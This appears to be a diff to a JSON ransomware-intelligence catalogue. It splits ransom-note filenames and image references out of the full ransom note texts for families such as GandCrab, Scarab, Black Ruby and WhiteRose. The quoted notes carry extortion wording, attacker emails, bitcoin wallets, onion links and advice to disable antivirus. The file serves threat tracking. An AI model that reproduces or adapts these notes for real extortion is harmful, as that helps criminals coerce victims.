"https://www.bleepingcomputer.com/news/security/hc7-gotya-ransomware-installed-via-remote-desktop-services-spread-with-psexec/", "https://id-ransomware.blogspot.com/2017/12/hc7-ransomware.html" @@ -11139,21 +11321,25 @@ ], "payment-method": "Bitcoin Email", "ransomnotes": [ + "Attention: if you do not have money then you do not need to write to us!\nThe file is encrypted with the RSA-2048 algorithm, only we can decrypt the file.\n====================================================================================================\n fastrecovery@airmail.cc\n====================================================================================================\nYour files are encrypted!\nYour personal identifier:\n[redacted hex]\n====================================================================================================\nTo decrypt files, please contact us by email:\nfastrecovery@airmail.cc\n====================================================================================================\nThe file is encrypted with the RSA-2048 algorithm, only we can decrypt the file.\nAttention: if you do not have money then you do not need to write to us!", + "Your files are now encrypted!\n\nYour personal identifier:\n[redacted hex]\n\nAll your files have been encrypted due to a security problem with your PC.\n\nNow you should send us email with your personal identifier.\nThis email will be as confirmation you are ready to pay for decryption key.\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nContact us using this email address: mr.leen@protonmail.com\n\nFree decryption as guarantee!\nBefore paying you can send us up to 3 files for free decryption.\nThe total size of files must be less than 10Mb (non archived), and files should not contain\nvaluable information (databases, backups, large excel sheets, etc.).\n\nHow to obtain Bitcoins?\n * The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click\n 'Buy bitcoins', and select the seller by payment method and price:\n https://localbitcoins.com/buy_bitcoins\n * Also you can find other places to buy Bitcoins and beginners guide here:\n http://www.coindesk.com/information/how-can-i-buy-bitcoins\n\nAttention! \n * Do not rename encrypted files.\n * Do not try to decrypt your data using third party software, it may cause permanent data loss.\n * Decryption of your files with the help of third parties may cause increased price\n (they add their fee to our) or you can become a victim of a scam.", + "Attention, all your files are encrypted with the AES cbc-128 algorithm!\n \nIt's not a virus like WannaCry and others, I hacked your computer,\nThe encryption key and bitcoin wallet are unique to your computer,\nso you are guaranteed to be able to return your files.\n \nBut before you pay, you can make sure that I can really decrypt any of your files.\n \nTo do this, send me several encrypted files to cyrill.fedor0v@yandex.com, a maximum of 5 megabytes each, I will decrypt them\nand I will send you back. No more than 5 files. Do not forget to send in the letter bitcoin address 1BhHZxek7iUTm1mdrgax6yVrPzViqLhr9u from this file.\n \nAfter that, pay the decryption in the amount of 500$ to the bitcoin address: 1BhHZxek7iUTm1mdrgax6yVrPzViqLhr9u\nAfter payment, send me a letter to cyrill.fedor0v@yandex.com with payment notification.\nOnce payment is confirmed, I will send you a decryption program.\n \nYou can pay bitcoins online in many ways:\nhttps://buy.blockexplorer.com/ - payment by bank card\nhttps://www.buybitcoinworldwide.com/\nhttps://localbitcoins.net\n \nAbout Bitcoins:\nhttps://en.wikipedia.org/wiki/Bitcoin\n\n If you have any questions, write to me at cyrill.fedor0v@yandex.com\n \nAs a bonus, I will tell you how hacked your computer is and how to protect it in the future." + ], + "ransomnotes-filenames": [ "IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT", "HOW TO RECOVER ENCRYPTED FILES-fastrecovery@airmail.cc.TXT", "HOW TO RECOVER ENCRYPTED FILES.TXT", - "Attention: if you do not have money then you do not need to write to us!\nThe file is encrypted with the RSA-2048 algorithm, only we can decrypt the file.\n====================================================================================================\n fastrecovery@airmail.cc\n====================================================================================================\nYour files are encrypted!\nYour personal identifier:\n[redacted hex]\n====================================================================================================\nTo decrypt files, please contact us by email:\nfastrecovery@airmail.cc\n====================================================================================================\nThe file is encrypted with the RSA-2048 algorithm, only we can decrypt the file.\nAttention: if you do not have money then you do not need to write to us!", "INSTRUCTIONS FOR RESTORING FILES.TXT", - "Your files are now encrypted!\n\nYour personal identifier:\n[redacted hex]\n\nAll your files have been encrypted due to a security problem with your PC.\n\nNow you should send us email with your personal identifier.\nThis email will be as confirmation you are ready to pay for decryption key.\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nContact us using this email address: mr.leen@protonmail.com\n\nFree decryption as guarantee!\nBefore paying you can send us up to 3 files for free decryption.\nThe total size of files must be less than 10Mb (non archived), and files should not contain\nvaluable information (databases, backups, large excel sheets, etc.).\n\nHow to obtain Bitcoins?\n * The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click\n 'Buy bitcoins', and select the seller by payment method and price:\n https://localbitcoins.com/buy_bitcoins\n * Also you can find other places to buy Bitcoins and beginners guide here:\n http://www.coindesk.com/information/how-can-i-buy-bitcoins\n\nAttention! \n * Do not rename encrypted files.\n * Do not try to decrypt your data using third party software, it may cause permanent data loss.\n * Decryption of your files with the help of third parties may cause increased price\n (they add their fee to our) or you can become a victim of a scam.", "!!!ReadMeToDecrypt.txt", - "Attention, all your files are encrypted with the AES cbc-128 algorithm!\n \nIt's not a virus like WannaCry and others, I hacked your computer,\nThe encryption key and bitcoin wallet are unique to your computer,\nso you are guaranteed to be able to return your files.\n \nBut before you pay, you can make sure that I can really decrypt any of your files.\n \nTo do this, send me several encrypted files to cyrill.fedor0v@yandex.com, a maximum of 5 megabytes each, I will decrypt them\nand I will send you back. No more than 5 files. Do not forget to send in the letter bitcoin address 1BhHZxek7iUTm1mdrgax6yVrPzViqLhr9u from this file.\n \nAfter that, pay the decryption in the amount of 500$ to the bitcoin address: 1BhHZxek7iUTm1mdrgax6yVrPzViqLhr9u\nAfter payment, send me a letter to cyrill.fedor0v@yandex.com with payment notification.\nOnce payment is confirmed, I will send you a decryption program.\n \nYou can pay bitcoins online in many ways:\nhttps://buy.blockexplorer.com/ - payment by bank card\nhttps://www.buybitcoinworldwide.com/\nhttps://localbitcoins.net\n \nAbout Bitcoins:\nhttps://en.wikipedia.org/wiki/Bitcoin\n\n If you have any questions, write to me at cyrill.fedor0v@yandex.com\n \nAs a bonus, I will tell you how hacked your computer is and how to protect it in the future.", + "_How to restore files.TXT", + "How to restore encrypted files.txt" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/september/14/Scarab-ransomware.jpg", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsnFZrGX4AE2H1c[1].jpg", - "_How to restore files.TXT", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/30/Ds8PMFpW0AIcYuJ[1].jpg", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/december/7/DtzAAIAW0AEHC86[1].jpg", - "https://pbs.twimg.com/media/DuC07vPWkAAMekP.jpg", - "How to restore encrypted files.txt" + "https://pbs.twimg.com/media/DuC07vPWkAAMekP.jpg" ], "refs": [ "https://www.bleepingcomputer.com/news/security/scarab-ransomware-pushed-via-massive-spam-campaign/", @@ -11183,9 +11369,11 @@ "payment-method": "Bitcoin", "price": "0.00725", "ransomnotes": [ - "HOW TO DECRYPT FILES.url", "As you may have already noticed, all your important files are encrypted and you no longer have access to them. A unique key has been generated specifically for this PC and two very strong encryption algorithm was applied in that process. Original content of your files are wiped and overwritten with encrypted data so it cannot be recovered using any conventional data recovery tool.\n\nThe good news is that there is still a chance to recover your files, you just need to have the right key.\n\nTo obtain the key, visit our website from the menu above. You have to be fast, after 96 hours the key will be blocked and all your files will remain permanently encrypted since no one will be able to recover them without the key!\n\nRemember, do not try anything stupid, the program has several security measures to delete all your files and cause the damage to your PC.\n\nTo avoid any misunderstanding, please read Help section." ], + "ransomnotes-filenames": [ + "HOW TO DECRYPT FILES.url" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/file-spider-ransomware-targeting-the-balkans-with-malspam/", "http://id-ransomware.blogspot.com/2017/12/file-spider-ransomware.html" @@ -11260,13 +11448,17 @@ "payment-method": "Dash", "price": "1 - 3", "ransomnotes": [ - "GDCB-DECRYPT.txt", - "CRAB-Decrypt.txt", - "https://www.bleepstatic.com/images/news/ransomware/g/gandcrab/v3/desktop-background.jpg", "---= GANDCRAB =---\n\nAttention!\nAll your files documents, photos, databases and other important files are encrypted and have the extension: .GDCB \nThe only method of recovering files is to purchase a private key. It is on our server and only we can recover your files.\nThe server with your key is in a closed network TOR. You can get there by the following ways:\n1. Download Tor browser - https://www.torproject.org/\n2. Install Tor browser\n3. Open Tor Browser\n4. Open link in tor browser:http://gdcbghvjyqy7jclk.onion/[id]\n5. Follow the instructions on this page\n\nIf Tor/Tor browser is locked in your country or you can not install it, open one of the following links in your regular browser:\n1. http://gdcbghvjyqy7jclk.onion.top/[id]\n2. http://gdcbghvjyqy7jclk.onion.casa/[id]\n3. http://gdcbghvjyqy7jclk.onion.guide/[id]\n4. http://gdcbghvjyqy7jclk.onion.rip/[id]\n5. http://gdcbghvjyqy7jclk.onion.plus/[id]\n\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.\n\nDANGEROUS!\nDo not try to modify files or use your own private key - this will result in the loss of your data forever!", "---= GANDCRAB =---\nAttention!\nAll your files documents, photos, databases and other important files are encrypted and have the extension: .GDCB\nThe only method of recovering files is to purchase a private key. It is on our server and only we can recover your files.\nThe server with your key is in a closed network TOR. You can get there by the following ways:\n1. Download Tor browser - https://www.torproject.org/\n2. Install Tor browser\n3. Open Tor Browser\n4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/[id]\n5. Follow the instructions on this page\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.\nIf you can't download TOR and use it, or in your country TOR blocked, read it:\n1. Visit https://tox.chat/download.html\n2. Download and install qTOX on your PC.\n3. Open it, click \"New Profile\" and create profile.\n4. Search our contact - 6C5AD4057E594E090E0C987B3089F74335DA75F04B7403E0575663C26134956917D193B195A5\n5. In message please write your ID and wait our answer: 6361f798c4ba3647\nDANGEROUS!\nDo not try to modify files or use your own private key - this will result in the loss of your data forever!", "ENCRYPTED BY GANDCRAB 3\n\nDEAR [user_name],\n\nYOUR FILES ARE UNDER STRONG PROTECTION BY OUR SOFTWARE. IN ORDER TO RESTORE IT YOU MUST BUY DECRYPTOR\n\nFor further steps read CRAB-DECRYPT.txt that is located in every encrypted folder.", - " ---= GANDCRAB V3 =--- \n\nAttention! \n\nAll your files documents, photos, databases and other important files are encrypted and have the extension: .CRAB \n\nThe only method of recovering files is to purchase a private key. It is on our server and only we can recover your files. \n\n\nThe server with your key is in a closed network TOR. You can get there by the following ways: \n\n0. Download Tor browser - https://www.torproject.org/ \n\n1. Install Tor browser \n\n2. Open Tor Browser \n\n3. Open link in TOR browser: http://gandcrab2pie73et.onion/[id] \n\n4. Follow the instructions on this page \n\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \n\n\nThe alternative way to contact us is to use Jabber messanger. Read how to:\n0. Download Psi-Plus Jabber Client: https://psi-im.org/download/\n1. Register new account: http://sj.ms/register.php\n0) Enter \"username\": [id]\n1) Enter \"password\": your password\n2. Add new account in Psi\n3. Add and write Jabber ID: ransomware@sj.ms any message\n4. Follow instruction bot \n\nATTENTION!\nIt is a bot! It's fully automated artificial system without human control!\nTo contact us use TOR links. We can provide you all required proofs of decryption availibility anytime. We are open to conversations.\nYou can read instructions how to install and use jabber here http://www.sfu.ca/jabber/Psi_Jabber_PC.pdf \n\nCAUGHTION! \n\nDo not try to modify files or use your own private key. This will result in the loss of your data forever! ", + " ---= GANDCRAB V3 =--- \n\nAttention! \n\nAll your files documents, photos, databases and other important files are encrypted and have the extension: .CRAB \n\nThe only method of recovering files is to purchase a private key. It is on our server and only we can recover your files. \n\n\nThe server with your key is in a closed network TOR. You can get there by the following ways: \n\n0. Download Tor browser - https://www.torproject.org/ \n\n1. Install Tor browser \n\n2. Open Tor Browser \n\n3. Open link in TOR browser: http://gandcrab2pie73et.onion/[id] \n\n4. Follow the instructions on this page \n\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \n\n\nThe alternative way to contact us is to use Jabber messanger. Read how to:\n0. Download Psi-Plus Jabber Client: https://psi-im.org/download/\n1. Register new account: http://sj.ms/register.php\n0) Enter \"username\": [id]\n1) Enter \"password\": your password\n2. Add new account in Psi\n3. Add and write Jabber ID: ransomware@sj.ms any message\n4. Follow instruction bot \n\nATTENTION!\nIt is a bot! It's fully automated artificial system without human control!\nTo contact us use TOR links. We can provide you all required proofs of decryption availibility anytime. We are open to conversations.\nYou can read instructions how to install and use jabber here http://www.sfu.ca/jabber/Psi_Jabber_PC.pdf \n\nCAUGHTION! \n\nDo not try to modify files or use your own private key. This will result in the loss of your data forever! " + ], + "ransomnotes-filenames": [ + "GDCB-DECRYPT.txt", + "CRAB-Decrypt.txt" + ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/ransomware/g/gandcrab/v3/desktop-background.jpg", "https://www.bleepstatic.com/images/news/security/f/fallout-exploit-kit/gandcrab-fallout.jpg" ], "refs": [ @@ -11369,17 +11561,21 @@ "payment-method": "Bitcoin", "price": "750 $", "ransomnotes": [ - "How_return_files.txt", - "Image.jpg", "Hello... :)\nFor instructions on how to recovery the files, write to me:\njonskuper578@india.com\njonskuper578@gmx.de\njonskuper578@protonmail.com\nIn the letter, indicate your personal ID (see the file format).\nIf you have not received an answer, write to me again.", "WARNING!!!\nYour ID 83624883\nOUR FILES ARE DECRIPTED\nYour documents, photos, database, save games and other important data was encrypted.\nData recovery the necessary interpreter. To get the interpreter, should send an email to helppme@india.com or hepl1112@aol.com.\nIn a letter to include Your personal ID (see the beginning of this document).\nIn response to the letter You will receive the address of your Bitcoin wallet to which you want to perform the transfer.\nWhen money transfer is confirmed, You will receive the decrypter file for Your computer.\nAfter starting the programm-interpreter, all Your files will be restored.\nAttention! Do not attempt to remove a program or run the anti-virus tools.", - "Привет мой друг!\nВсе файлы на твоем ПК зашифрованы!\nМой email: helppme@india.com или\nhepl1112@aol.com", - "Hello my friend!\nAll files on your PC encryphted!\nmy email: helppme@india.com or\nhepl1112@aol.com", "ПРЕДУПРЕЖДЕНИЕ!!!\nВаш ID 83624883\nOUR FILES ARE DECRIPTED\nЗашифрованы ваши документы, фотографии, база данных, сохранения игр и другие важные данные.\nВосстановить данные нужен интерпретатор. Для получения интерпретатора надо отправить email на helppme@india.com или hepl1112@aol.com.\nВ письме укажите Ваш личный ID (см. начало этого документа).\nВ ответ на письмо Вы получите адрес вашего биткойн-кошелька, на который Вы хотите сделать перевод.\nКогда денежный перевод будет подтвержден, вы получите файл-декриптер для Вашего компьютера.\nПосле запуска программы-интерпретатора все Ваши файлы будут восстановлены.\nВнимание! Не пытайтесь удалить программу или запустить антивирусные программы.", - "https://4.bp.blogspot.com/-6jE-GW6wCr8/WQY1L_uHsFI/AAAAAAAAE-A/3YR0bwwBJqgp8CsApZq4F_44JkMB0m2WwCLcB/s320/image-note.jpg", - "https://2.bp.blogspot.com/-T4lvnNISc_A/WQY1SI1r1mI/AAAAAAAAE-E/tH7p02nS2LUTvXmq66poiyM1RYhHc4HbwCLcB/s200/lock-note.jpg", "Hello…\nFor instructions on how to recovery the files, write to me:\nvine77725@gmx.de\nvine77725@india.com\nvine77725@protonmail.com\nIn the letter, indicate your personal ID (see the file format).\nIf you have not received an answer, write to me again." ], + "ransomnotes-filenames": [ + "How_return_files.txt", + "Image.jpg", + "Привет мой друг!\nВсе файлы на твоем ПК зашифрованы!\nМой email: helppme@india.com или\nhepl1112@aol.com", + "Hello my friend!\nAll files on your PC encryphted!\nmy email: helppme@india.com or\nhepl1112@aol.com" + ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-6jE-GW6wCr8/WQY1L_uHsFI/AAAAAAAAE-A/3YR0bwwBJqgp8CsApZq4F_44JkMB0m2WwCLcB/s320/image-note.jpg", + "https://2.bp.blogspot.com/-T4lvnNISc_A/WQY1SI1r1mI/AAAAAAAAE-E/tH7p02nS2LUTvXmq66poiyM1RYhHc4HbwCLcB/s200/lock-note.jpg" + ], "refs": [ "https://www.securityweek.com/rsautil-ransomware-distributed-rdp-attacks", "https://www.bleepingcomputer.com/news/security/rsautil-ransomware-helppme-india-com-installed-via-hacked-remote-desktop-services/", @@ -11399,7 +11595,9 @@ "meta": { "payment-method": "Bitcoin", "ransomnotes": [ - "Your computer is encrypted . Mail cryz1@protonmail.com . Send your ID 5612.\nNote! You have only 72 hours for write on e-mail (see below) or all your files will be lost!", + "Your computer is encrypted . Mail cryz1@protonmail.com . Send your ID 5612.\nNote! You have only 72 hours for write on e-mail (see below) or all your files will be lost!" + ], + "ransomnotes-filenames": [ "README_DECRYPT.txt" ], "refs": [ @@ -11414,9 +11612,11 @@ "meta": { "payment-method": "Bitcoin Email (Tor)", "ransomnotes": [ - "Zenis-Instructions.html", "*** All your files has been encrypted ***\n\nI am ZENIS. A mischievous boy who loves cryptography, hardware and programming. My world is full of unanswered questions and puzzles half and half, and I'm coming to discover a new world. A world in digital space that you are supposed to play the role of my toys.\n\nIf you want to win in this game, you have to listen carefully to my instructions, otherwise you will be caught up in a one-step game and you will become the main loser of the story.\n\nMy instructions are simple and clear. Then follow these steps:\n\n1. Send this file (Zenis-Instructions.html) to my email with one your encrypted file less than 2 MB to trust to the game.\n\n2. I decrypt your file for free and send for you.\n\n3. If you confirm the correctness of the files, verify that the files are correct via email\n\n4. Then receive the price of decrypting files\n\n5. After you have deposited, please send me the payment details\n\n6. After i confirm deposit, i send you the \"Zenis Decryptor\" along with \"Private Key\" to recovery all your files.\n\nNow you can finish the game. You won the game. congratulations.\n\n\nPlease submit your request to both emails:\n\nTheZenis@Tutanota.com\n\nTheZenis@MailFence.com\n\nIf you did not receive an email after six hours, submit your request to the following emails:\n\nTheZenis@Protonmail.com\n\nTheZenis@Mail2Tor.com (On the TOR network)\n\n\nWarning: 3rd party and public programs, It may cause irreversible damage to your files. And your files will be lost forever." ], + "ransomnotes-filenames": [ + "Zenis-Instructions.html" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/zenis-ransomware-encrypts-your-data-and-deletes-your-backups/", "https://id-ransomware.blogspot.com/2018/03/zenis-ransomware.html" @@ -11445,9 +11645,11 @@ ], "payment-method": "Monero miner on the computer", "ransomnotes": [ - "HOW-TO-DECRYPT-FILES.txt", " ____ __ __ ____ __\n / __ ) / /____ _ _____ / /__ / __ \\ __ __ / /_ __ __\n / __ |/ // __ `// ___// //_/ / /_/ // / / // __ \\ / / / /\n / /_/ // // /_/ // /__ / ,< / _, _// /_/ // /_/ // /_/ /\n /_____//_/ \\__,_/ \\___//_/|_| /_/ |_| \\__,_//_.___/ \\__, /\n /____/\n\n===================== Identification Key =====================\n\n[id]\n\n===================== Identification Key =====================\n\n[Can not access your files?]\n\nCongratulations, you are now part of our family #BlackRuby Ransomware. The range of this family is wider and bigger every day.\nOur hosts welcome our presence because we will give them a scant souvenir from the heart of Earth.\n\nThis time, we are guest with a new souvenir called \"Black Ruby\". A ruby ​​in black, different, beautiful, and brilliant, which has been bothered to extract those years and you must also endure this hard work to keep it. If you do not have the patience of this difficulty or you hate some of this precious stone, we are willing to receive the price years of mining and finding rubies for your relief and other people of the world who are guests of the black ruby.\n\nSo let's talk a little bit with you without a metaphor and literary terms to understand the importance of the subject.\nIt does not matter if you're a small business or you manage a large organization, no matter whether you are a regular user or a committed employee, it's important that you have a black ruby and to get rid of it, you need to get back to previous situation and we need a next step.\n\nThe breadth of this family is not supposed to stop, because we have enough knowledge and you also trust our knowledge.\nWe are always your backers and guardian of your information at this multi-day banquet and be sure that no one in the world can take it from you except for us who extracts this precious stone. We need a two-sided cooperation in developing cybersecurity knowledge. The background to this cooperation is a mutual trust, which will result in peace and tranquility. you must pay $650 (USD) worth of Bitcoins for restore your system to the previous state and you are free to choose to stay in this situation or return to the normal.\n\nDo not forget that your opportunity is limited. From these limits you can create golden situations. Be sure we will help you in this way and to know that having a black ruby does not always mean riches. You and your system are poor, poor knowledge of cybersecurity and lack of security on your system!.\n\n ========================================================================================================================\n\n [HOW TO DECRYPT FILES]\n\n 1. Copy \"Identification Key\".\n 2. Send this key with two encrypted files (less than 5 MB) for trust us to email address \"TheBlackRuby@Protonmail.com\".\n 3. We decrypt your two files and send them to your email.\n 4. After ensuring the integrity of the files, you must pay $650 (USD) with bitcoin and send transaction code to our email, our bitcoin address is \"19S7k3zHphKiYr85T25FnqdxizHcgmjoj1\".\n 5. You get \"Black Ruby Decryptor\" Along with the private key of your system.\n 6. Everything returns to the normal and your files will bereleased.\n\n========================================================================================================================\n\n[What is encryption?]\n\nEncryption is a reversible modification of information for security reasons but providing full access to it for authorised users.\n To become an authorised user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an \"Personal Identification Key\". But not only it. It is required also to have the special decryption software\n(in your case “Black Ruby Decryptor” software) for safe and complete decryption of all your files and data.\n\n[Everything is clear for me but what should I do?]\n\n The first step is reading these instructions to the end. Your files have been encrypted with the “Black Ruby Ransomware” software; the instructions (“HOW-TO-DECRYPT-FILES.txt”) in the folders with your encrypted files are not viruses, they will help you. After reading this text the most part of people start searching in the Internet the words the “Black Ruby Ransomware” where they find a lot of ideas, recommendation and instructions. It is necessary to realise that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them.\n\n[Have you got advice?]\n\n[*** Any attempts to get back you files with the third-party tools can be fatal for your encrypted files ***]\nThe most part of the tried-party software change data with the encrypted files to restore it but this cases damage to the files. \nFinally it will be impossible to decrypt your files. When you make a puzzle but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly. You should realise that any intervention of the third-party software to restore files encrypted with the “Black Ruby Ransomware” software may be fatal for your files.\n\nIf you look through this text in the Internet and realise that something is wrong with your files but you do not have any instructions to restore your files, please contact your antivirus support." ], + "ransomnotes-filenames": [ + "HOW-TO-DECRYPT-FILES.txt" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/", "https://www.accenture.com/t20180803T064557Z__w__/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf" @@ -11465,9 +11667,11 @@ ], "payment-method": "Website Tor", "ransomnotes": [ - "HOW-TO-RECOVERY-FILES.TXT", "[Rose ASCII art]\n\n[WhiteRose written in ASCII art]\n\nThe singing of the sparrows, the breezes of the northern mountains and smell of the earth that was raining in the morning filled the entire garden space. I'm sitting on a wooden chair next to a bush tree, I have a readable book in my hands and I am sweating my spring with a cup of bitter coffee. Today is a different day.\n\nBehind me is an empty house of dreams and in front of me, full of beautiful white roses. To my left is an empty blue pool of red fish and my right, trees full of spring white blooms.\n\n I drink coffee, I'll continue to read a book from William Faulkner. In the garden environment, peace and quiet. My life always goes that way. Always alone without even an intimate friend.\n\nI have neither a pet, nor a friend or an enemy; I am a normal person with fantastic wishes among the hordes of white rose flowers. Everything is natural. I'm just a little interested in hacking and programming. My only electronic devices in this big garden are an old laptop for do projects and an iPhone for check out the news feeds for malware analytics on Twitter without likes posts.\n\nBelieve me, my only assets are the white roses of this garden. I think of days and write at night: the story, poem, code, exploit or the accumulation of the number of white roses sold and I say to myself that the wealth is having different friends of different races, languages, habits and religions, Not only being in a fairly stylish garden with full of original white roses.\n\nToday, I think deeply about the decision that has involved my mind for several weeks. A decision to freedom and at the worth of unity, intimacy, joy and love and is the decision to release white roses and to give gifts to all peoples of the world.\n\nI do not think about selling white roses again. This time, I will plant all the white roses of the garden to bring a different gift for the people of each country. No matter where is my garden and where I am from, no matter if you are a housekeeper or a big company owner, it does not matter if you are the west of the world or its east, it's important that the white roses are endless and infinite. You do not need to send letters or e-mails to get these roses. Just wait it tomorrow. Wait for good days with White Rose.\n\nI hope you accept this gift from me and if it reaches you, close your eyes and place yourself in a large garden on a wooden chair and feel this beautiful scene to reduce your anxiety and everyday tension.\n\nThank you for trusting me. Now open your eyes. Your system has a flower like a small garden; A white rose flower.\n\n/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n\n[Recovery Instructions]\n\n I. Download qTox on your computer from [https://tox.chat/download.html]\nII. Create new profile then enter our ID in search contacts\n Our Tox ID: \"6F548F217897AA4140FB4C514C8187F2FFDBA3CAFC83795DEE2FBCA369E689006B7CED4A18E9\". III. Wait for us to accept your request.\nIV. Copy '[PersonalKey]' in \"HOW-TO-RECOVERY-FILES.TXT\" file and send this key with one encrypted file less size then 2MB for trust us in our Tox chat.\n IV.I. Only if you did not receive a reply after 24 hours from us, send your message to our secure tor email address \"TheWhiteRose@Torbox3uiot6wchz.onion\".\n IV.II. For perform \"Step IV.I\" and enter the TOR network, you must download tor and register in \"http://torbox3uiot6wchz.onion\" Mail Service)\nV. We decrypt your two files and we will send you.\nVI. After ensuring the integrity of the files, We will send you payment info.\nVII. Now after payment, you get \"WhiteRose Decryptor\" Along with the private key of your system.\nVIII.Everything returns to the normal and your files will be released.\n\n/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n\nWhat is encryption?\n\n In cryptography, encryption is the process of encoding a message or information in such a way that only authorized parties can access it, and those who are not authorized cannot. Encryption does not itself prevent interference, but denies the intelligible content to a would-be interceptor. In an encryption scheme, the intended information or message, referred to as plaintext, is encrypted using an encryption algorithm – a cipher – generating ciphertext that can be read only if decrypted. For technical reasons, an encryption scheme usually uses a pseudo-random encryption key generated by an algorithm. It is in principle possible to decrypt the message without possessing the key, but, for a well-designed encryption scheme, considerable computational resources and skills are required. An authorized recipient can easily decrypt the message with the key provided by the originator to recipients but not to unauthorized users. in your case “WhiteRose Decryptor” software for safe and complete decryption of all your files and data.\n\nAny other way?\n\nIf you look through this text in the Internet and realise that something is wrong with your files but you do not have any instructions to restore your files, please contact your antivirus support." ], + "ransomnotes-filenames": [ + "HOW-TO-RECOVERY-FILES.TXT" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/the-whiterose-ransomware-is-decryptable-and-tells-a-strange-story/", "http://id-ransomware.blogspot.com/2018/03/whiterose-ransomware.html" @@ -11484,7 +11688,7 @@ ], "payment-method": "Game", "price": "Play to decrypt", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/ransomware/p/pubg-ransomware/pubg-ransomware.jpg" ], "refs": [ @@ -11503,8 +11707,10 @@ ], "payment-method": "Bitcoin", "price": "0.5 - 1", - "ransomnotes": [ - "How To Decode Files.hta", + "ransomnotes-filenames": [ + "How To Decode Files.hta" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/august/31/DlsLwUjXsAA0xyY[1].jpg" ], "refs": [ @@ -11528,9 +11734,11 @@ "payment-method": "Bitcoin", "price": "0.2", "ransomnotes": [ - "READ_ME_FOR_DECRYPT_[id].txt", " ALL Y0UR D0CUMENTS, PHOTOS, DATABASES AND OTHER IMP0RTANT FILES HAVE BEEN ENCRYPTED!\n ====================================================================================================\n Your files are NOT damaged! Your files are modified only. This modification is reversible.\n\n The only 1 way to decrypt your files is to receive the private key and decryption program.\n\n Any attempts to restore your files with the third-party software will be fatal for your files!\n ====================================================================================================\n To receive the private key and decryption program follow the instructions below:\n\n 1. Download \"Tor Browser\" from https://www.torproject.org/ and install it.\n\n 2. In the \"Tor Browser\" open your personal page here:\n\n\n http://[victim_id].ofotqrmsrdc6c3rz.onion/EP866p5M93wDS513\n\n\n Note! This page is available via \"Tor Browser\" only.\n ====================================================================================================\n Also you can use temporary addresses on your personal page without using \"Tor Browser\":\n\n\n http://[victim_id].bankme.date/EP866p5M93wDS513\n\n http://[victim_id].jobsnot.services/EP866p5M93wDS513\n\n http://[victim_id].carefit.agency/EP866p5M93wDS513\n\n http://[victim_id].hotdisk.world/EP866p5M93wDS513\n\n\n Note! These are temporary addresses! They will be available for a limited amount of time!" ], + "ransomnotes-filenames": [ + "READ_ME_FOR_DECRYPT_[id].txt" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/decrypters-for-some-versions-of-magniber-ransomware-released/", "https://www.bleepingcomputer.com/news/security/goodbye-cerber-hello-magniber-ransomware/", @@ -11549,9 +11757,11 @@ "payment-method": "Bitcoin", "price": "10 000 $", "ransomnotes": [ - "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/april/6/vurten.jpg", "UNCRYPT.README" ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/april/6/vurten.jpg" + ], "refs": [ "https://twitter.com/siri_urz/status/981191281195044867", "http://id-ransomware.blogspot.com/2018/04/vurten-ransomware.html" @@ -11592,9 +11802,11 @@ ".FUCK" ], "ransomnotes": [ - "https://pastebin.com/xkRaRytW", "What Happened to My Computer?\nYour important files are encrypted.\nMany of your documents, photos, videos, databases and other files are no longer accessible because they have been encrypted. Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service.\n\nCan I Recover My Files?\nSure. We guarantee that you can recover all your files safely and easily. But you have not so enough time.\nBut if you want to decrypt all your files, you need to pay.\n\nHow Do I Pay?\nPayment is accepted in Bitcoin only.\nPlease check the current price of Bitcoin and buy some bitcoins.\nAnd send the correct amount to the address specified in this window.\n\nWe strongly recommend you to not remove this software, and disable your anti-virus for a while, until you pay and the payment gets processed. If your anti-virus gets updated and removes this software automatically, it will not be able to recover your files even if you pay!\nOnce the payment is sent, send us an e-mail to the specified address specifying your \"Client ID\", you will be sent your decryption key in return.\nHow to buy Bitcoins?\n\nStep 1 : Create a portfolio on the Blockchain website at the address : https://blockchain.info/fr/wallet/#/signup\nStep 2 : Sign in to your account you just created and purchase the amount shown : https://blockchain.info/wallet/#/buy-sell\n Step 3 : Send the amount to the indicated Bitcoin address, once this is done send us an email with your \"Client ID\" you can retreive this in the file \"instruction.txt\" or \"Whats Appens With My File.s.txt\" in order to ask us the key of decryption of your data.\n\nContact us at : spaghetih@protonmail.com\nSend 20$ to Bitcoin at 1MFA4PEuDoe2UCKgabrwm8P4KztASKtiuv if you want decrypt your files !\nYour Client ID is : [id]" ], + 